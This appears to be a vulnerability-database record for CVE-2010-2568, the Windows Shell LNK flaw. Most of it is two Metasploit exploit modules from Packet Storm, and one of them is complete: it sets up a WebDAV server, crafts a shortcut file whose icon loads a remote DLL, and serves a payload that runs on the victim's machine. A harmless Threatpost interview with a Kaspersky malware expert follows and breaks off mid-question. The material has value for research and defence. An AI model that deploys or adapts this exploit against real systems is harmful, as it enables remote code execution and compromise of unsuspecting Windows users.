[\"10000001000000000000000000000000\".to_i(2)].pack('N') \nret \nend \n \ndef exploit \n \nunc = \"\\\\\\\\\" \nif (datastore['UNCHOST']) \nunc << datastore['UNCHOST'].dup \nelse \nunc << ((datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address('50.50.50.50') : datastore['SRVHOST']) \nend \nunc << \"\\\\\" \nunc << rand_text_alpha(rand(8)+4) \nunc << \"\\\\\" \n \n@exploit_unc = unc \n@exploit_lnk = rand_text_alpha(rand(8)+4) + \".lnk\" \n@exploit_dll = rand_text_alpha(rand(8)+4) + \".dll\" \n \nif datastore['SRVPORT'].to_i != 80 || datastore['URIPATH'] != '/' \nraise RuntimeError, 'Using WebDAV requires SRVPORT=80 and URIPATH=/' \nend \n \nprint_status(\"\") \nprint_status(\"Send vulnerable clients to #{@exploit_unc}.\") \nprint_status(\"Or, get clients to save and render the icon of http://<your host>/<anything>.lnk\") \nprint_status(\"\") \n \nsuper \nend \nend \n \n`\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/92425/ms10_046_shortcut_icon_dllloader.rb.txt"}, {"lastseen": "2016-12-05T22:13:45", "description": "", "published": "2010-07-21T00:00:00", "type": "packetstorm", "title": "Microsoft Windows Shell LNK Code Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-2568"], "modified": "2010-07-21T00:00:00", "id": "PACKETSTORM:91994", "href": "https://packetstormsecurity.com/files/91994/Microsoft-Windows-Shell-LNK-Code-Execution.html", "sourceData": "`## \n# $Id: ms10_xxx_windows_shell_lnk_execute.rb 9888 2010-07-20 19:54:56Z hdm $ \n## \n \n## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. \n# http://metasploit.com/framework/ \n## \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = ExcellentRanking \n \n# \n# This module acts as an HTTP server \n# \ninclude Msf::Exploit::Remote::HttpServer::HTML \ninclude Msf::Exploit::EXE \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Microsoft Windows Shell LNK Code Execution', \n'Description' => %q{ \nThis module exploits a vulnerability in the handling of Windows \nShortcut files (.LNK) that contain an icon resource pointing to a \nmalicious DLL. This module creates a WebDAV service that can be used \nto run an arbitrary payload when accessed as a UNC path. \n \n}, \n'Author' => \n[ \n'hdm', # Module itself \n'jduck', # WebDAV implementation \n'B_H' # Clean LNK template \n], \n'License' => MSF_LICENSE, \n'Version' => '$Revision: 9888 $', \n'References' => \n[ \n['CVE', '2010-2568'], \n['OSVDB', '66387'], \n['URL', 'http://www.microsoft.com/technet/security/advisory/2286198.mspx'], \n], \n'DefaultOptions' => \n{ \n'EXITFUNC' => 'process', \n}, \n'Payload' => \n{ \n'Space' => 2048, \n}, \n'Platform' => 'win', \n'Targets' => \n[ \n[ 'Automatic', { } ] \n], \n'DisclosureDate' => 'Jun 09 2010', \n'DefaultTarget' => 0)) \n \nregister_options( \n[ \nOptPort.new( 'SRVPORT', [ true, \"The daemon port to listen on (do not change)\", 80 ]), \nOptString.new( 'URIPATH', [ true, \"The URI to use (do not change).\", \"/\" ]), \n], self.class) \n \nderegister_options('SSL', 'SSLVersion') # Just for now \nend \n \ndef on_request_uri(cli, request) \n \ncase request.method \nwhen 'OPTIONS' \nprocess_options(cli, request) \nwhen 'PROPFIND' \nprocess_propfind(cli, request) \nwhen 'GET' \nprocess_get(cli, request) \nelse \nprint_error(\"Unexpected request method encountered: #{request.method}\") \nresp = create_response(404, \"Not Found\") \nresp.body = \"\" \nresp['Content-Type'] = 'text/html' \ncli.send_response(resp) \nend \n \nend \n \ndef process_get(cli, request) \n \nmyhost = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST'] \nwebdav = \"\\\\\\\\#{myhost}\\\\\" \n \nif (request.uri =~ /\\.dll$/i) \nprint_status \"Sending DLL payload #{cli.peerhost}:#{cli.peerport} ...\" \nreturn if ((p = regenerate_payload(cli)) == nil) \n \ndata = Msf::Util::EXE.to_win32pe_dll(framework, p.encoded) \nsend_response(cli, data, { 'Content-Type' => 'application/octet-stream' }) \nreturn \nend \n \nif (request.uri =~ /\\.lnk$/i) \nprint_status \"Sending LNK file to #{cli.peerhost}:#{cli.peerport} ...\" \nreturn if ((p = regenerate_payload(cli)) == nil) \n \ndata = generate_link(\"#{webdav}#{@exploit_base}\\\\#{@exploit_dll}\") \n \nsend_response(cli, data, { 'Content-Type' => 'application/octet-stream' }) \nreturn \nend \n \nprint_status \"Sending UNC redirect to #{cli.peerhost}:#{cli.peerport} ...\" \nresp = create_response(200, \"OK\") \n \nresp.body = %Q|<html><head><meta http-equiv=\"refresh\" content=\"0;URL=\\\\\\\\#{webdav}#{@exploit_base}\\\\\"></head><body></body></html>| \n \nresp['Content-Type'] = 'text/html' \ncli.send_response(resp) \nend \n \n# \n# OPTIONS requests sent by the WebDav Mini-Redirector \n# \ndef process_options(cli, request) \nprint_status(\"Responding to WebDAV OPTIONS request from #{cli.peerhost}:#{cli.peerport}\") \nheaders = { \n'MS-Author-Via' => 'DAV', \n# 'DASL' => '<DAV:sql>', \n# 'DAV' => '1, 2', \n'Allow' => 'OPTIONS, GET, PROPFIND', \n'Public' => 'OPTIONS, GET, PROPFIND' \n} \nresp = create_response(207, \"Multi-Status\") \nresp.body = \"\" \nresp['Content-Type'] = 'text/xml' \ncli.send_response(resp) \nend \n \n# \n# PROPFIND requests sent by the WebDav Mini-Redirector \n# \ndef process_propfind(cli, request) \npath = request.uri \nprint_status(\"Received WebDAV PROPFIND request from #{cli.peerhost}:#{cli.peerport} #{path}\") \nbody = '' \n \nmy_host = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST'] \nmy_uri = \"http://#{my_host}/\" \n \nif path =~ /\\.dll$/i \n# Response for the DLL \nprint_status(\"Sending DLL multistatus for #{path} ...\") \nbody = %Q|<?xml version=\"1.0\" encoding=\"utf-8\"?> \n<D:multistatus xmlns:D=\"DAV:\" xmlns:b=\"urn:uuid:c2f41010-65b3-11d1-a29f-00aa00c14882/\"> \n<D:response xmlns:lp1=\"DAV:\" xmlns:lp2=\"http://apache.org/dav/props/\"> \n<D:href>#{path}#{@exploit_dll}</D:href> \n<D:propstat> \n<D:prop> \n<lp1:resourcetype/> \n<lp1:creationdate>2010-07-19T20:29:42Z</lp1:creationdate> \n<lp1:getcontentlength>#{rand(0x100000)+128000}</lp1:getcontentlength> \n<lp1:getlastmodified>Mon, 19 Jul 2010 20:29:42 GMT</lp1:getlastmodified> \n<lp1:getetag>\"#{\"%.16x\" % rand(0x100000000)}\"</lp1:getetag> \n<lp2:executable>T</lp2:executable> \n<D:supportedlock> \n<D:lockentry> \n<D:lockscope><D:exclusive/></D:lockscope> \n<D:locktype><D:write/></D:locktype> \n</D:lockentry> \n<D:lockentry> \n<D:lockscope><D:shared/></D:lockscope> \n<D:locktype><D:write/></D:locktype> \n</D:lockentry> \n</D:supportedlock> \n<D:lockdiscovery/> \n<D:getcontenttype>application/octet-stream</D:getcontenttype> \n</D:prop> \n<D:status>HTTP/1.1 200 OK</D:status> \n</D:propstat> \n</D:response> \n</D:multistatus> \n| \n \nresp = create_response(207, \"Multi-Status\") \nresp.body = body \nresp['Content-Type'] = 'text/xml' \ncli.send_response(resp) \nreturn \nend \n \nif path =~ /\\.lnk$/i \n# Response for the DLL \nprint_status(\"Sending DLL multistatus for #{path} ...\") \nbody = %Q|<?xml version=\"1.0\" encoding=\"utf-8\"?> \n<D:multistatus xmlns:D=\"DAV:\" xmlns:b=\"urn:uuid:c2f41010-65b3-11d1-a29f-00aa00c14882/\"> \n<D:response xmlns:lp1=\"DAV:\" xmlns:lp2=\"http://apache.org/dav/props/\"> \n<D:href>#{path}#{@exploit_lnk}</D:href> \n<D:propstat> \n<D:prop> \n<lp1:resourcetype/> \n<lp1:creationdate>2010-07-19T20:29:42Z</lp1:creationdate> \n<lp1:getcontentlength>#{rand(0x100)+128}</lp1:getcontentlength> \n<lp1:getlastmodified>Mon, 19 Jul 2010 20:29:42 GMT</lp1:getlastmodified> \n<lp1:getetag>\"#{\"%.16x\" % rand(0x100000000)}\"</lp1:getetag> \n<lp2:executable>T</lp2:executable> \n<D:supportedlock> \n<D:lockentry> \n<D:lockscope><D:exclusive/></D:lockscope> \n<D:locktype><D:write/></D:locktype> \n</D:lockentry> \n<D:lockentry> \n<D:lockscope><D:shared/></D:lockscope> \n<D:locktype><D:write/></D:locktype> \n</D:lockentry> \n</D:supportedlock> \n<D:lockdiscovery/> \n<D:getcontenttype>shortcut</D:getcontenttype> \n</D:prop> \n<D:status>HTTP/1.1 200 OK</D:status> \n</D:propstat> \n</D:response> \n</D:multistatus> \n| \n \nresp = create_response(207, \"Multi-Status\") \nresp.body = body \nresp['Content-Type'] = 'text/xml' \ncli.send_response(resp) \nreturn \nend \n \nif path !~ /\\/$/ \n \nif path.index(\".\") \nprint_status(\"Sending 404 for #{path} ...\") \nresp = create_response(404, \"Not Found\") \nresp['Content-Type'] = 'text/html' \ncli.send_response(resp) \nreturn \nelse \nprint_status(\"Sending 301 for #{path} ...\") \nresp = create_response(301, \"Moved\") \nresp[\"Location\"] = path + \"/\" \nresp['Content-Type'] = 'text/html' \ncli.send_response(resp) \nreturn \nend \nend \n \nprint_status(\"Sending directory multistatus for #{path} ...\") \nbody = %Q|<?xml version=\"1.0\" encoding=\"utf-8\"?> \n<D:multistatus xmlns:D=\"DAV:\" xmlns:b=\"urn:uuid:c2f41010-65b3-11d1-a29f-00aa00c14882/\"> \n<D:response xmlns:lp1=\"DAV:\" xmlns:lp2=\"http://apache.org/dav/props/\"> \n<D:href>#{path}</D:href> \n<D:propstat> \n<D:prop> \n<lp1:resourcetype><D:collection/></lp1:resourcetype> \n<lp1:creationdate>2010-07-19T20:29:42Z</lp1:creationdate> \n<lp1:getlastmodified>Mon, 19 Jul 2010 20:29:42 GMT</lp1:getlastmodified> \n<lp1:getetag>\"#{\"%.16x\" % rand(0x100000000)}\"</lp1:getetag> \n<D:supportedlock> \n<D:lockentry> \n<D:lockscope><D:exclusive/></D:lockscope> \n<D:locktype><D:write/></D:locktype> \n</D:lockentry> \n<D:lockentry> \n<D:lockscope><D:shared/></D:lockscope> \n<D:locktype><D:write/></D:locktype> \n</D:lockentry> \n</D:supportedlock> \n<D:lockdiscovery/> \n<D:getcontenttype>httpd/unix-directory</D:getcontenttype> \n</D:prop> \n<D:status>HTTP/1.1 200 OK</D:status> \n</D:propstat> \n</D:response> \n| \n \n \nsubdirectory = %Q| \n<D:response xmlns:lp1=\"DAV:\" xmlns:lp2=\"http://apache.org/dav/props/\"> \n<D:href>#{path}#{Rex::Text.rand_text_alpha(6)}/</D:href> \n<D:propstat> \n<D:prop> \n<lp1:resourcetype><D:collection/></lp1:resourcetype> \n<lp1:creationdate>2010-07-19T20:29:42Z</lp1:creationdate> \n<lp1:getlastmodified>Mon, 19 Jul 2010 20:29:42 GMT</lp1:getlastmodified> \n<lp1:getetag>\"#{\"%.16x\" % rand(0x100000000)}\"</lp1:getetag> \n<D:supportedlock> \n<D:lockentry> \n<D:lockscope><D:exclusive/></D:lockscope> \n<D:locktype><D:write/></D:locktype> \n</D:lockentry> \n<D:lockentry> \n<D:lockscope><D:shared/></D:lockscope> \n<D:locktype><D:write/></D:locktype> \n</D:lockentry> \n</D:supportedlock> \n<D:lockdiscovery/> \n<D:getcontenttype>httpd/unix-directory</D:getcontenttype> \n</D:prop> \n<D:status>HTTP/1.1 200 OK</D:status> \n</D:propstat> \n</D:response> \n| \n \nfiles = %Q| \n<D:response xmlns:lp1=\"DAV:\" xmlns:lp2=\"http://apache.org/dav/props/\"> \n<D:href>#{path}#{@exploit_dll}</D:href> \n<D:propstat> \n<D:prop> \n<lp1:resourcetype/> \n<lp1:creationdate>2010-07-19T20:29:42Z</lp1:creationdate> \n<lp1:getcontentlength>#{rand(0x100000)+128000}</lp1:getcontentlength> \n<lp1:getlastmodified>Mon, 19 Jul 2010 20:29:42 GMT</lp1:getlastmodified> \n<lp1:getetag>\"#{\"%.16x\" % rand(0x100000000)}\"</lp1:getetag> \n<lp2:executable>T</lp2:executable> \n<D:supportedlock> \n<D:lockentry> \n<D:lockscope><D:exclusive/></D:lockscope> \n<D:locktype><D:write/></D:locktype> \n</D:lockentry> \n<D:lockentry> \n<D:lockscope><D:shared/></D:lockscope> \n<D:locktype><D:write/></D:locktype> \n</D:lockentry> \n</D:supportedlock> \n<D:lockdiscovery/> \n<D:getcontenttype>application/octet-stream</D:getcontenttype> \n</D:prop> \n<D:status>HTTP/1.1 200 OK</D:status> \n</D:propstat> \n</D:response> \n \n<D:response xmlns:lp1=\"DAV:\" xmlns:lp2=\"http://apache.org/dav/props/\"> \n<D:href>#{path}#{@exploit_lnk}</D:href> \n<D:propstat> \n<D:prop> \n<lp1:resourcetype/> \n<lp1:creationdate>2010-07-19T20:29:42Z</lp1:creationdate> \n<lp1:getcontentlength>#{rand(0x100)+128}</lp1:getcontentlength> \n<lp1:getlastmodified>Mon, 19 Jul 2010 20:29:42 GMT</lp1:getlastmodified> \n<lp1:getetag>\"#{\"%.16x\" % rand(0x100000000)}\"</lp1:getetag> \n<lp2:executable>T</lp2:executable> \n<D:supportedlock> \n<D:lockentry> \n<D:lockscope><D:exclusive/></D:lockscope> \n<D:locktype><D:write/></D:locktype> \n</D:lockentry> \n<D:lockentry> \n<D:lockscope><D:shared/></D:lockscope> \n<D:locktype><D:write/></D:locktype> \n</D:lockentry> \n</D:supportedlock> \n<D:lockdiscovery/> \n<D:getcontenttype>shortcut</D:getcontenttype> \n</D:prop> \n<D:status>HTTP/1.1 200 OK</D:status> \n</D:propstat> \n</D:response> \n| \nif request[\"Depth\"].to_i > 0 \nif path.scan(\"/\").length < 2 \nbody << subdirectory \nelse \nbody << files \nend \nend \n \nbody << \"</D:multistatus>\" \n \nbody.gsub!(/\\t/, '') \n \n# send the response \nresp = create_response(207, \"Multi-Status\") \nresp.body = body \nresp['Content-Type'] = 'text/xml; charset=\"utf8\"' \ncli.send_response(resp) \nend \n \ndef generate_link(unc) \n[ 0x4c, 0x00, 0x00, 0x00, 0x01, 0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, \n0xc0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x46, 0xff, 0x00, 0x00, 0x00, \n0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, \n0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, \n0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, \n0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, \n0x00, 0x00, 0x00, 0x00, 0x00, 0xff, 0x14, 0x00, 0x1f, 0x00, 0xe0, 0x4f, \n0xd0, 0x20, 0xea, 0x3a, 0x69, 0x10, 0xa2, 0xd8, 0x08, 0x00, 0x2b, 0x30, \n0x30, 0x9d, 0x14, 0x00, 0x2e, 0x1e, 0x20, 0x20, 0xec, 0x21, 0xea, 0x3a, \n0x69, 0x10, 0xa2, 0xdd, 0x08, 0x00, 0x2b, 0x30, 0x30, 0x9d, 0x0c, 0x01, \n0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x6a, \n0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 ].pack(\"C*\") + \nunc.unpack(\"C*\").pack(\"v*\") + \"\\x00\\x00\" \nend \n \ndef exploit \n \nmyhost = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address('50.50.50.50') : datastore['SRVHOST'] \n \n@exploit_unc = \"\\\\\\\\#{myhost}\\\\\" \n@exploit_base = rand_text_alpha(rand(8)+4) \n@exploit_lnk = rand_text_alpha(rand(8)+4) + \".lnk\" \n@exploit_dll = rand_text_alpha(rand(8)+4) + \".dll\" \n \nif datastore['SRVPORT'].to_i != 80 || datastore['URIPATH'] != '/' \nraise RuntimeError, 'Using WebDAV requires SRVPORT=80 and URIPATH=/' \nend \n \nprint_status(\"\") \nprint_status(\"Send vulnerable clients to #{@exploit_unc}#{@exploit_base}\\\\\") \nprint_status(\"\") \nsuper \nend \nend \n \n`\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/91994/ms10_xxx_windows_shell_lnk_execute.rb.txt"}], "threatpost": [{"lastseen": "2018-10-06T23:01:42", "bulletinFamily": "info", "cvelist": ["CVE-2010-2568"], "description": "The last year has seen a lot of changes in the threat landscape, with the emergence of a number of new cyber espionage tools such as Gauss and Flame, as well as an increase in the volume of malware targeting mobile platforms such as Android. Recently, Alex Gostev, the chief malware expert at Kaspersky Lab, answered questions submitted by users on Facebook, discussing the evolution of antimalware solutions, the threats to mobile devices and how governments around the world are handling the cybercrime explosion.\n\n**Hi Alex, I would like to ****ask about cyber spying. You know, we make a lot of overseas calls via Skype in business today. Is there a wiretapping risk with Skype calls?**\n\n**Alex Gostev**: If the computer of the Skype user is infe****cted with a malicious program capable of recording voice traffic (or intercepting data from a microphone), then, naturally, any voice communication via Skype can be intercepted. This is not just a theoretical possibility; incidents like this have in fact taken place repeatedly, and have even involved software created by law enforcement agencies. For example, [an incident of this kind took place in Germany](<http://www.securelist.com/en/blog/208193167/Federal_Trojan_s_got_a_Big_Brother>) last year.\n\n**Are governments around the world coping with cybercrimes or just studying it? **\n\n**Alex Gostev**: The main problem with fighting cybercrime today is its global character. Undoubtedly, many countries in the world have achieved notable success in combating this threat; however, the most serious crimes can only be investigated successfully if there is international cooperation. Unfortunately, this is an area where problems do exist: a number of countries, for one reason or another, are not involved in international initiatives to fight cybercrime.\n\n**How did you manage to become who you are? Where did you get all that knowledge? **\n\nAlex Gostev: That\u2019s a tough one J It was back in 1994 when I came across my first computer viruses; I only joined Kaspersky Lab in 2002. So you could say I gained most of my knowledge about viruses on my own. Take my word for it: there is sufficient information available on the Internet both to learn to analyze malicious programs and to understand the current trends in cybercrime and threat evolution. So, I suggest you read as many sites and expert blogs as you can, and try to reproduce their findings on your own; try to understand how the experts came to the conclusions they write about. Kaspersky Lab has three expert blogs: [Securelist](<http://www.securelist.com>), [Threatpost](<https://threatpost.com/interview-kaspersky-chief-malware-expert-alex-gostev-122412/>) and our new consumer [blog](<http://blog.kaspersky.com/>).\n\n**Why is it that virus makers mostly target the Windows operating system? **\n\n**Alex Gostev**: The answer is simple: over 90% of users are on Windows. There is a similar situation when it comes to mobile platforms: Android leads the pack both in terms of users and malware.\n\n**They say that it\u2019s cyber war out there. Has Kaspersky been attacked? **\n\n**Alex Gostev:** Just like any other company involved in information security, Kaspersky Lab is a frequent target for attacks. This is to be expected. And, of course, we use the most reliable technologies to protect us from such attacks.\n\n**I want to work for Kapersky\u2019s GReAT team. What would be the best college to finish and courses to take? **\n\n**Alex Gostev**: A technical education is important. There\u2019s no one college or set of courses that\u2019s the best to become a security researcher, but a good knowledge of operating systems, programming languages and a willingness to work hard are essential.\n\n**How many threats are added to Kaspersky databases daily to provide effective protection to everyone? What\u2019s the comparison to free antivirus solutions? **\n\n**Alex Gostev**: At the present time, we detect some 200,000 new malicious programs every day. Naturally, it takes serious resources \u2013 both human and technical \u2013 to collect and process such huge volumes of threats. Besides malicious files, there are also other types of threats including malicious sites, network attacks, exploits etc. that we also need to keep tabs on. All this requires an extensive financial outlay. Independent testing shows that we have an edge over freeware security tools.\n\n** **\n\n**With nations increasingly using harmful software on their enemies what do you think about this? What\u2019s Kaspersky\u2019s stance on this? Has Kaspersky been approached by governments? What do you foresee for the future of industrial/governmental cyber wafrare. What\u2019s Kaspersky\u2019s future in this? **\n\n**Alex Gostev**: That\u2019s a difficult question that really merits a separate article. In a nutshell, our first, major priority is to protect our users. So we will protect them from all types of malicious programs regardless of who creates them. It is also our aim to communicate a simple message to the world\u2019s governments: any malware can also be used against its creators; unintended targets can also become victims. Cybercrime must become subject to international law and must come under the regulations and monitoring of the global community.\n\n** **\n\n**Anything to protect us from our own government? **\n\n**Alex Gostev**: We protect against malicious programs without making any distinctions as to who created them.\n\n**I know that Windows phone is not considered a virus target, but for those of us who want more security for our phone and feel left out, why is it so hard to make virus protection for Windows Phones? **\n\n**Alex Gostev**: There are no problems whatsoever about creating antivirus protection for Windows Phone (at least, Kaspersky Lab does not have any problems doing it).\n\n**Why do people say Apple computers don\u2019t get viruses when they actually get more than people think? **\n\n**Alex Gostev**: These are old stereotypes that were created primarily by Apple themselves. Apple have claimed for a long time that their computers are much better protected. Eventually, they admitted that malware does exist for Apple computers and even incorporated a [primitive antivirus scanner into OS X](<https://threatpost.com/apple-malware-blocker-left-dead-010410/>). Microsoft, for instance, also had to spend a decade or so learning to take virus threats seriously. Apple is only taking its first steps along this road, but we think they are moving in the right direction, especially if you look at the protection system on the iPhone.\n\n**Alex, what\u2019s the best way of preventing your computer being infected and locked and asked to pay a steep fee to unlock it? **\n\n**Alex Gostev**: In the overwhelming majority of cases involving extortion malware, or [ransomware](<https://threatpost.com/ransomware-scams-netting-criminals-33000-day-110812/>), the victim computer is infected via a web browser. This is usually down to vulnerabilities in Java, Adobe Flash or in the browsers themselves. All these vulnerabilities have long been known and patched by the vendors. So, your first step should be to install all the latest patches and updates for your software on a regular basis.\n\n**What are the main Android threats?**\n\n<http://www.securelist.com/en/analysis/204792254/Kaspersky_Security_Bulletin_2012_Malware_Evolution>\n\nSee point 3 (\u201cThe explosion of Android threats\u201d) and item 10 (\u201cMobile malware\u201d) in this security bulletin.\n\n**Why does Kaspersky often (maybe very often) recognize \u201cgood\u201d software as malicious? **\n\n**Alex Gostev**: I have to disagree with you on this one. Kaspersky Lab\u2019s products have one of the lowest false positive rates in the entire industry; independent test results back up this claim. We couldn\u2019t possibly have received the \u201c[Product of the year](<http://eugene.kaspersky.com/2012/01/27/were-av-comparatives-product-of-the-year/>)\u201d award unless we had demonstrated the fewest false positives in dedicated testing.\n\n**Which web browser do you prefer? Which one is more secure? Which one is the best solution for Kaspersky products?**\n\n**Alex Gostev:** At the current time, I prefer Google Chrome. Which browser is the safest? Well, the answer to that is changing all the time. The situation can change in an instant \u2013 the discovery of a 0-day vulnerability would immediately turn the safest browser into the most vulnerable one. Therefore, apart from keeping an eye on the browser vulnerability situation, it is also advisable to complement your browser with dedicated protection tools, such as a sandbox, whitelisting etc. All these things are implemented in Kaspersky Lab\u2019s products.\n\n**What are the most \u201dfashionable\u201d viruses today? What was the most unusual virus detected last year?******\n\n**Alex Gostev:** Depends what you mean by \u201cfashionable\u201d. If we\u2019re talking about high-profile malware, it would primarily be a whole new generation of malware in the Middle East which includes [Flame](<http://www.securelist.com/en/blog/208193522/The_Flame_Questions_and_Answers>), [Duqu](<http://www.securelist.com/en/blog/208193178/Duqu_FAQ>), [Gauss,](<http://www.securelist.com/en/blog?topic=199380371>) [miniFlame,](<http://www.securelist.com/en/analysis/204792247/miniFlame_aka_SPE_Elvis_and_his_friends>) [Wiper.](<http://www.securelist.com/en/blog/208193808/What_was_that_Wiper_thing>) All these kept us fairly busy throughout the year, both in terms of searching for and analyzing the findings. The realm of cyber weapons, i.e. malware created at the state level to attack the citizens, companies and authorities of other countries, is probably the hottest and most interesting topic right now.\n\nAs for unusual malware, there were traits in every single program mentioned above that we thought (and still think) were unusual. For instance, one of the Gauss modules installs a modified proprietary [font called Palida Narrow into the system](<https://threatpost.com/researchers-release-detection-tool-gauss-malwares-palida-narrow-font-081012/>). Why it does this remains a mystery. Another example is the propagation module incorporated into the Flame worm \u2013it helps the worm spread via local area networks, and that is a whole other story. Its creators have not only successfully implemented an unprecedented [MD5 cryptographic attack](<https://threatpost.com/forthcoming-sha-3-hash-function-may-be-unnecessary-092412/>) but have also created a \u201creal\u201d Microsoft certificate. This is way beyond a 0-day vulnerability \u2013 this is \u201cgod mode\u201d. Nothing like this has occurred before.\n\n**Is being a virus analyst a difficult job?**\n\n**Alex Gostev**: It\u2019s only difficult for the first few years. After that, once you\u2019ve gained experience, it gets easier. I remember about** six years ago we organized competitions in our Virus Lab to see who could analyze malware the fastest. The record was 43 seconds from a file arriving for analysis till a detection was added**. On the other hand, virus analysis is only a small part of the job. You have to be well informed about all developments, including news from your competitors and news from the other side of the front line; you need to be aware of where it\u2019s all going and what will happen tomorrow. I suppose, this is the most difficult part, and it\u2019s getting more difficult every day.\n\n**What new types of malware does the near future have in store for us? **\n\n**Alex Gostev**: There are unlikely to be any new types of malware. All the generic types of malware behavior have long been identified and malware, including viruses, worms, Trojans and exploits, are evolving along those lines. Of course, dozens of subtypes exist within each category, such as Trojan cryptographers, banking Trojans, network worms etc. However, malware evolution takes place exclusively in terms of seizing new platforms or operating systems \u2013 mobile Trojans are a vivid example. From the point of view of technology, everything is the same, but with new platforms and new possibilities, such as the sending of SMS text messages. Therefore, we expect all the conventional types of threats to migrate in the near future from personal computers to the entire range of modern devices.\n\n**Alex, do you keep a diary for yourself? E.g. I came across such and such a malicious program today. I was able to treat it in such and such a way. Tried such and such a dish and liked it. The weather was nice, etc.**\n\n**Alex Gostev**: No, I simply don\u2019t have time for that. Time and again I think that it might be worthwhile writing down how my research is going. I think it would make a pretty interesting book. On the other hand, many of the things we\u2019re involved in and the things we\u2019re aware of cannot be published (yet).\n\n**Which operating system do you use? Which do you think is the safest for desktops?**\n\n**Alex Gostev**: I am not a dedicated fan of any specific operating system; in fact, I have a very simple view on them: for every task, there exists a suitable operating system. I arrange my work accordingly. In a single day I can work under Windows, OS X and Linux, not to mention mobile platforms for phones and tablet PCs.\n\nThere are no secure desktop operating systems. Any operating system can only be called secure on a conditional basis until the next 0-day vulnerability emerges. When this happens, it instantly turns the safest operating system into the most vulnerable one. I\u2019m talking here about a situation where the vulnerability is publicly disclosed. As for privately-known vulnerabilities, well they always exist for any given operating system.\n\n**How much of his work time does a senior virus analyst put into practical, hands-on work, such as reverse engineering, debugging and sandboxing?**\n\n**Alex Gostev**: It depends on the time of the year and the research project the team is working on at a specific time. Sometimes, I can spend 80% of the day on hands-on research of a specific piece of malware. That may last for, say, a week. Sometimes I don\u2019t touch a single malware file for an entire day. If you look at the bigger picture, I\u2019d say I spend no more than 20% of my time throughout the year on hands-on research. However, when I was a virus analyst processing the inbound malware traffic, it took up 100% of my time. Now, I have to do a lot of non-core activities, such as giving answers to your questions \ud83d\ude42\n\n**What make of smartphone or telephone does Alexander use (which manufacturer, model)? Does he have a mobile security solution installed on it?**\n\n**Alex Gostev**: At the moment I have an iPhone 3. It is a corporate phone. I don\u2019t have any antivirus on it, because: a) no antivirus solution exists for iPhones; b) it has not been jailbroken c) there are no viruses for non-jailbroken iPhones anyway.\n\n**How do I properly uninstall Kaspersky Lab\u2019s products so no garbage is left in the system and registry?**\n\n**Alex Gostev**: The \u201cproper\u201d way is to use the standard uninstaller. Should anything go wrong and the result is not satisfactory, use the dedicated removal tool: <http://support.kaspersky.com/faq/?qid=208279463>\n\n**How can I get rid of my paranoia and obsession that there is a Trojan in the system, or a vulnerability is being exploited?**\n\n**Alex Gostev**: Why would you want to get rid of it? When it comes to IT security paranoia is actually a positive thing, as it makes you more careful about what you do and how you do it. It makes you try to figure out how the system works, promotes your self-development and broadens your outlook. In other words, it\u2019s a good thing.\n\n**At work, I often have to compile all types of DLL files. Security software pretty often reports them as being potentially dangerous, even after I block heuristic analysis. What can I do other than adding exclusion rules into the work directory?**\n\n**Alex Gostev**: I can\u2019t give recommendations unless I have a complete understanding of which files you use, which functions you use, what type of warnings your security software gives, what it specifically reports etc. If you are totally sure that your files are clean (beware though, there may be surprises, e.g. check out the history of the Induc virus), then go ahead and add them to the exclusion rules and contact your security provider\u2019s support line and let them find out what the reasons are for the false positives.\n\n**How safe is it to use cloud-based storage? Do you know of any cases where the cloud has been infected?**\n\n**Alex Gostev**: Ah, this is a major topic. There was a recent newspaper publication about this in which I feature. Unfortunately, it\u2019s only in Russian. For those of you who know Russian, check it out here: <http://www.kommersant.ru/doc/1771693>****\n\n**Can you please tell us about how Kaspersky\u2019s Virus Encyclopedia documentation is created. **\n\n**Alex Gostev**: These days, 99% of the malware descriptions in Kaspersky\u2019s Virus Encyclopedia have been created by a robot using standard templates and based on automatic analysis of files. Several thousand old descriptions also exist that were written by humans (yes, there used to be time when a new dedicated description could be created for each new virus). Several hundred of them were created specifically by me.\n\n**The management of one large company says that Kaspersky Lab writes viruses and creates zombie networks to infect computers in the Russian segment of the Internet, in order to sell more of their products and provide consulting services. Can you please comment on this. I can\u2019t disclose the name of the company as I work for it.**\n\n**Alex Gostev**: I recommend you change your employer. If your management has such a mindset, you never know what they\u2019ll come up with next.\n\n**Can you dispel the myth that working in IT security is the preserve of men. It would be great if you could also provide some supporting facts.**\n\n**Alex Gostev**: This is in fact not a myth, but the current reality. Men do indeed make up the majority of experts in this field. Having said that, there are women who work in IT security, and all of them demonstrate a greater professionalism than most men working in this area. In my private view, a woman working in IT security has to demonstrate a very high level of professionalism. All the women I know who work in this sphere, are very good specialists, but there are so few of them. Furthermore, they are so well known in their profession (especially in Russia) that no proof is really necessary.****\n\n**What can you say about the antivirus that is incorporated in Windows 8? This takes away quite a bit business from the security software manufacturers. How 